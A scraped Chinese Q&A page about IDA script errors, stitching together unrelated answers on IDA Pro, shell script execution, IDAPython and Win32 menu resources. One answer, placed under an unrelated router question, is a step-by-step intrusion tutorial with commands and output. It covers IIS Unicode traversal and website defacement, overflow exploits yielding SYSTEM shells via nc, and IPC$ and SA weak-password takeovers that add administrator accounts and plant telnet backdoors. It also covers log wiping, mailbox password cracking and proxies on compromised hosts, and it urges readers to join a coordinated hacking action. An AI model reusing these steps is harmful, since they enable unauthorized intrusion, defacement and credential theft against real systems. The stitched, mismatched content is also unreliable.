导航:首页 > 程序命令 > ida脚本命令报错

ida脚本命令报错

发布时间:2022-05-16 23:39:57

❶ IDA Pro权威指南的内容简介

《IDA Pro权威指南》内容简介:IDA Pro(交互式反汇编器专业版)是应用最广泛的静态反汇编工具,在IT领域有着举足轻重的地位,但其文档资料一直都不够完善。在IDA Pr0创建者Ilfak的协助下问世的这《IDA Pro权威指南》,完美地弥补了这一缺憾。C卜¨1s的理论被业界公认为是权威且令人信服的。而他的模拟器也是公开发布的IDA插件中最棒的一款。
《IDA Pro权威指南》首先描述反汇编理论、逆向工程的基本信息}111DA Pro的背景知识,然后系统地介绍IDA的基本布局和功能、复杂数据结构的处理、交叉引用与绘图功能,以及如何在非Wiridows平台上运行IDA。书中由浅入深地介绍了IDA的配置、F LlRT技术、IDA类型库的扩展以及一些IDA限制。难得的是。《IDA Pro权威指南》还探讨了IDA的可扩展性。涉及IDA脚本、SDK、插件、加载器模块和处理器模块。最后阐述了IDA在逆向工程中的实际用法,讨论了各种编译器的区别、模糊代码分析和漏洞分析、IDA插件以及IDA调试器。

❷ 如何执行shell脚本其中一条命令

方法一:切换到shell脚本所在的目录(此时,称为工作目录)执行shell脚本:

复制代码代码如下:

cd /data/shell

./hello.sh

./的意思是说在当前的工作目录下执行hello.sh。如果不加上./,bash可能会响应找到不到hello.sh的错误信息。因为目前的工作目录(/data/shell)可能不在执行程序默认的搜索路径之列,也就是说,不在环境变量PASH的内容之中。查看PATH的内容可用 echo $PASH 命令。现在的/data/shell就不在环境变量PASH中的,所以必须加上./才可执行。

方法二:以绝对路径的方式去执行bash shell脚本:

复制代码代码如下:

/data/shell/hello.sh

方法三:直接使用bash 或sh 来执行bash shell脚本:

复制代码代码如下:

cd /data/shell

bash hello.sh



复制代码代码如下:

cd /data/shell

sh hello.sh

注意,若是以方法三的方式来执行,那么,可以不必事先设定shell的执行权限,甚至都不用写shell文件中的第一行(指定bash路径)。因为方法三是将hello.sh作为参数传给sh(bash)命令来执行的。这时不是hello.sh自己来执行,而是被人家调用执行,所以不要执行权限。那么不用指定bash路径自然也好理解了啊,呵呵……。

方法四:在当前的shell环境中执行bash shell脚本:

复制代码代码如下:

cd /data/shell

. hello.sh



复制代码代码如下:

cd /data/shell

source hello.sh

前三种方法执行shell脚本时都是在当前shell(称为父shell)开启一个子shell环境,此shell脚本就在这个子shell环境中执行。shell脚本执行完后子shell环境随即关闭,然后又回到父shell中。而方法四则是在当前shell中执行的。

❸ ROS无法使用telnet操作,winbox下想添加脚本scripts的添加按钮灰色

由于网上很多朋友问我怎么入侵别人的机器,所以整理了一些我认为容易学的漏洞入侵方法,希望能给初学者一些帮助,下面讲的内容很简单,高手就不用浪费时间看了,:)

(1) UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞,
目标有了,我们马上打开浏览器。在网址栏里输入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好,我们成功看到了机器里的C盘了。
我们在浏览器里输入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功,只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。
(3) idq溢出漏洞
要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。
首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。

(4)IDA溢出漏洞
所用程序:idahack
进入MS-DOS方式(假设idq.exe在c:\下)
c:\idahack.exe
运行参数:c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好,现在你可以telnet它的80端口了,我们用NC来连接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
(C)版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。

(5).printer漏洞
这个漏洞,我们用两个程序来入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK,我们又成功取得system权限!玩吧。

(6)139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C,D,E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。

(7)IPC入侵
所有程序:流光
开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:
net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录
net time file://对方IP/ || 看看对方的本地时间
at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序
telnet 对方ip 端口

我们也可以改网页:
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了,假如你黑页在C:下,就输入" 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?

日志清除,断开连接 :
我们 cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete

(8)超管SA空密码漏洞
使用的工具:流光IV
启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” —— SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。
net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板:
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe:
srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe:
ntlm.exe \\127.0.0.1\admin$\system32
启动服务:
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入:
telnet X.X.X.X 99
然后我们要启动NTLM.exe:
在telnet状态下直接输入ntlm回车。
显示:windows 2000 telnet mp,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧?
(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密码
这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。

(10)frontpage进行攻击
打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入http://127.0.0.1(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。

(11)用肉鸡做SOCK5代理跳板
需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我们在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密码" /user:帐号
通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
复制完毕后,
看肉鸡上现在的时间:
c:\net time \\127.0.0.1
显示当前时间是 2002/4/13 晚上 09:00
我们来启动srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01后。我们来连接肉鸡:
c:\telnet 127.0.0.1 99
连上后显示:
c:\winnt\system32>
接着我们启动NTLM.exe
c:\winnt\system32>ntlm
显示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我们终止srv.exe的telnet服务:
C:\WINNT\system32>net stop telnet
继续:
C:\WINNT\system32>net start telnet
再启动TELNET。
OK,我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切顺利,我们现在正式开始做代理:
c:>sss.exe -install <---------开始安装
显示:
c:>sksockserver installed!
来看看配置:
c:>sss -config show
显示:
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual <---服务启动方式
SkServer Enable Client Set Num:0 <---客户端的项目个数
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数

来启动服务:
c:>net start skserver
提示你正在启动,并且完成。
来检查一下是不是启动了:
c:>net start <-----------看看启动的服务列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。
安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在 SOCKS Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,呵呵,和 Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,
Profile name :程序名,随便写。
Command Line: 命令行,点后面的Browse...找到你的程序路径
Working:填好上面那个,这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。

好了,终于写完了,上面的内容都很简单,很适合初学者,还望高手们不好见笑,刚好听说这次5.1有很多联盟有所行动,希望上面的内容能教会一部分人,少走弯路,让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够,还差很远,所以还不敢写。

❹ 怎么打印 ida的gdb 命令

GDB是一个强大的命令行调试工具。虽然X Window提供了GDB的图形版DDD,但是我仍然更钟爱在命令行模式下使用GDB。大家知道命令行的强大就是在于,其可以形成执行序列,形成脚本。UNIX下的软件全是命令行的,这给程序开发提代供了极大的便利

❺ 谁能帮我写个ida脚本实现把指令var

你的意思是这样的?
_text:01007487 lea eax, [ebp+var_2C]
_text:0100748A push eax
_text:0100748B lea eax, [ebp+var_30]
_text:0100748E push eax
_text:0100748F lea eax, [ebp+var_34]

----->>>>>
_text:01007487 lea eax, [ebp-2Ch]
_text:0100748A push eax
_text:0100748B lea eax, [ebp-30h]
_text:0100748E push eax
_text:0100748F lea eax, [ebp-34h]

idapython写的比较拙。。

代码:

from idautils import *
ea = ScreenEA()
address_start = SegStart(ea)
address_end = SegEnd(ea)
i = address_start
while 1:
if i<address_end:
OpHex(i,-1)
print "%X" % i
i = i+1
else:
break

❻ 加速键是不是Windows应用程序的资源.

加速键

主菜单,顶层菜单,弹出式菜单,子菜单,右键弹出式菜单,系统弹出式菜单。菜单中的菜单项有好几种,从资源定义的角度来看,分隔用的横线也是一个菜单项,除横线外其他菜单项可以供用户选择,也可以设置为“禁止”或“灰化”状态暂时停用。

菜单项上的圆点表示选中标记是互斥的,对钩表示是不互斥的。

加速键就是菜单项的快捷键。表示当窗口是激活的时候,不必打开菜单,直接按快捷键就相当于选择了菜单项。

菜单和加速键的资源定义

资源脚本文件举例:

[plain] view plain
//Menu.rc

#include <resource.h>

#define ICO_MAIN 0x1000 //图标

#define IDM_MAIN 0x2000 //菜单

#define IDA_MAIN 0x2000 //加速键

#define IDM_OPEN 0x4101

#define IDM_OPTION 0x

#define IDM_EXIT 0x4103

#define IDM_SETFONT 0x4201

#define IDM_SETCOLOR 0x4202

#define IDM_INACT 0x4203

#define IDM_GRAY 0x4204

#define IDM_BIG 0x4205

#define IDM_SMALL 0x4206

#define IDM_LIST 0x4207

#define IDM_DETALL 0x4208

#define IDM_TOOLBAR 0x4209

#define IDM_TOOLBARTEXT 0x4210

#define IDM_INPUTBAR 0x4211

#define IDM_STATUSBAR 0x4212

#define IDM_HELP 0x4301

#define IDM_ABOUT 0x4302

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

ICO_MAIN ICON “Main.ico”

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

IDM_MAIN menu discardable

BEGIN

popup “文件(&F)”

BEGIN

menuitem “打开文件(&O)…”, IDM_OPEN

menuitem “关闭文件(&C)…”, IDM_OPTION

menuitem separator

menuitem “退出(&X)”, IDM_EXIT

END

popup “查看(&V)”

BEGIN

menuitem “字体(&F)…\tAlt+F”, IDM_SETFONT

menuitem “背景色(&B) …\tCtrl+Alt+B”, IDM_SETCOLOR

menuitem separator

menuitem “被禁用的菜单项”, IDM_INACT, INACTIVE

menuitem “被灰化的菜单项”, IDM_GRAY, GRAYED

menuitem separator

menuitem “大图标(&G)”, IDM_BIG

menuitem “小图标(&M)”, IDM_SMALL

menuitem “列表(&L)”, IDM_LIST

menuitem “详细资料(&D)”, IDM_DETAIL

menuitem separator

menuitem “工具栏(&T)”

BEGIN

menuitem “标准按钮(&S)”, IDM_TOOLBAR

menuitem “文字标签(&C)”, IDM_TOOLBARTEXT

menuitem “命令栏(&I)”, IDM_INPUTBAR

END

menuitem “状态栏(&U)”, IDM_STATUSBAR

END

popup “帮助(&H)” HELP

BEGIN

menuitem “帮助主题(&H)\F1”, IDM_HELP

menuitem separator

menuitem “关于本程序(&A)…”, IDM_ABOUT

END

END

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

IDA_MAIN accelerators

BEGIN

VK_F1, IDM_HELP, VIRTKEY

“B”, IDM_SETCOLOR, VIRTKEY, CONTROL, ALT

“F”, IDM_SETFONT, VIRTKEY, ALT

END

//编译上述文件使用的makefile文件如下:

NAME = Menu

OBJS = $(NAME).obj

RES = $(NAME).res

LINK_FLAG = /subsystem:windows

ML_FLAG = /c /coff

$(NAME).exe: $(OBJ) $(RES)

Link $(LINK_FLAG) $(OBJS) $(RES)

.asm .obj:

ml $(ML_FLAG) $<

.rc .res:

rc $<

clean:

del *.obj

del *.res

为了编译资源文件,makefile中多了一个资源编译的隐含规则:

.rc .res:

rc $<

同时在exe文件的依赖文件中增加了Menu.res文件。

在rc文件中,各种语句使用的是C语言语法格式,因为资源编译器Rc.exe根本上就是Visual C++附带的,所以在定义等值语句的时候用的是#define,包含语句使用#include<文件名>,用到16进制数值的时候并不是用汇编的语法在后面加h,而是用前面加0x的方法,如1234h写为0x1234,注释也要用前面加//的方法。

在脚本文件的头部,首先要把MASM32软件包中的resource.h文件包含进来,这个文件中包括了资源定义中很多的预定义值,如窗口属性与加速键的键值等。资源在程序中的引用往往用一个数值来表示,称为资源的ID值,但在定义的时候直接使用数值不是很直观,所以往往用#define语句将数值定义为容易记忆的字符串。

菜单的定义

在资源脚本文件中菜单的定义格式是:

菜单ID MENU [DISCARDABLE]

BEGIN

菜单项定义



END

“菜单ID MENU [DISCARDABLE]”语句用来指定菜单的ID值和内存属性,菜单ID可以是16位的整数,范围是1~65535,在Menu.rc文件中,定义的菜单ID是2000h,但菜单ID也可以字符串表示,如下面的定义:

MainMenu menu

begin

menuitem…

end

表示菜单的ID是字符串型的“MainMenu”,但这样定义的话,在程序中引用的时候就要用字符串指针代替16进制的菜单ID值,显得相当不便,所以在实际应用中通常使用16进制数值当做菜单ID。

数值型ID的范围限制在1~65535之间的原因是字符串在内存中的线性地址总是大于10000h,API函数检测参数时发现小于10000h时就可以把它认为是数值型的,大于10000h时就当做字符串指针处理。

menu关键字后面的DISCARDABLE是菜单的内存属性,表示菜单在不再使用的时候可以暂时从内存中释放以节省内存,这是一个可选属性。菜单项的定义语句必须包含在begin和end关键字之内,这两个关键字也可以用花括号{和}代替。

菜单项目的定义方法有3类:

MENUITEM 菜单文字,命令ID[,选项列表] (用法1)

或 MENUITEM SEPARATOR (用法2)

或 POPUP 菜单文字[,选项列表] (用法3)

BEGIN

item-definitions



END

用法1定义的是普通菜单项。

组成部分有:

菜单文字——显示在菜单项中的字符串。如果需要字符串中某个字母带下横线,那么可以在字母前面加&符号,带下横线的字母可以被系统自动当做快捷键。另外,如果要把加速键的提示信息显示在菜单项的右边,如“字体”菜单项中的“Alt+F”字符,可以在两者中间加\t,表示插入一个Tab字符),写为“字体(&F)…\tAlt+F”,这样Tab后面的字符在显示的时候会右对齐。

命令ID——用来分辨不同的菜单项,当菜单项被选中的时候,Windows会向窗口过程发送WM_COMMAND消息,消息的参数就是这个命令ID。用命令ID可以分辨用户究竟选中了哪个菜单项,所以不同的菜单项应该定义不同的ID值,除非想让两个菜单项的功能相同。

选项——用来定义菜单项的各种属性,它可以是下列数值:

CHECKED——表示打上选定标志(对钩)。

GRAYED——表示菜单项是灰化的。

INACTIVE——表示菜单是禁用的。

MENUBREAK或MENUBARBREAK——表示将这个菜单项和以后的菜单项列到新的列中。

用法2定义的是菜单项之间的分隔线,显然,分隔线是不需要字符串和选项的。

用法3定义的是弹出式菜单,顶层菜单是由多个弹出式子菜单组成的,所以在Menu.rc文件中,主菜单是由“文件”、“查看”、“帮助”3个顺序定义的弹出式菜单组成的,弹出式菜单的定义也可以嵌套,如“查看”菜单中的“工具栏”又是一个弹出式菜单,在嵌套的时候要注意像写C的源程序一样把begin和end(或者{或})正确地配对。popup菜单的选项列表可以是以下的值:

GRAYED——表示菜单项是灰化的。

INACTIVE——表示菜单项是禁用的。

HELP——表示本项和以后的菜单项是右对齐的。

popup菜单项选中的时候会自动将弹出式菜单弹出来,不需要向程序发送消息,所以在定义的参数中不需要命令ID。

有些选项是可以同时定义,如果要指定超过一个的选项,中间要用逗号隔开,但是也有些小小的限制:GRAYED和INACTIVE不能同时使用,MENUBREAK和MENUBARBREAK也是不能同时使用的。

加速键的定义

和菜单的定义相比,加速键的定义要简单得多,具体的语法如下:

加速键ID ACCELERATORS

BEGIN

键名,命令ID [,类型] [,选项]



END

加速键ID同样可以是一个字符串或者是1~65535之间的数字,整个定义内容也是用begin和end(或花括号)包含起来,中间是多个加速键的定义项目,每个键占据一行,各字段的含义如下所示。

键名——表示加速键对应的按钮,可以有3种方式定义:

“^字母”:表示Ctrl键加上字母键。

“字母”:表示字母,这时类型必须指明是VIRTKEY。

数值:表示ASCII码为该数值的字母,这时类型必须指明为ASCII。

命令ID——按下加速键后,Windows向程序发送的命令ID。如果想把加速键和菜单项关联起来,这里就是要关联期间项的命令ID。

类型——用来指定键的定义方式,可以是VIRTKEY和ASCII,分别用来表示“键名”字段定义的是虚拟键还是ASCII码。

选项——可以是Alt,Control或Shift中的单个或多个,如果指定多个,则中间用逗号隔开,表示加速键是按键加上这些控制键的组合键。这些选项只能在类型是VIRTKEY的情况下才能使用。

在键名的定义中,系统按键如F1,F2,BackSpace和Esc等都是用虚拟键的方法定义的,Resource.h中已经包括所有的预定义,它们是以VK_开头的一引起值,如VK_BACK,VK_TAB,VK_RETURN,VK_ESCAPE,VK_DELETE,VK_F1和VK_F2等,读者可以查看Resource.h文件,下面是加速键定义的一些例子:

下面是加速键定义的一些例子:

“^C”, ID ;Ctrl+C

“K”, ID ;Shift+K

“k”, ID,ALT ;Alt+k

98, ID,ASCII ;b(字符b的ASCII码为98)

66, ID,ASCII ;B(Shift b)

“g”, ID ;g

VK_F1, ID,VIRTKEY ;F1

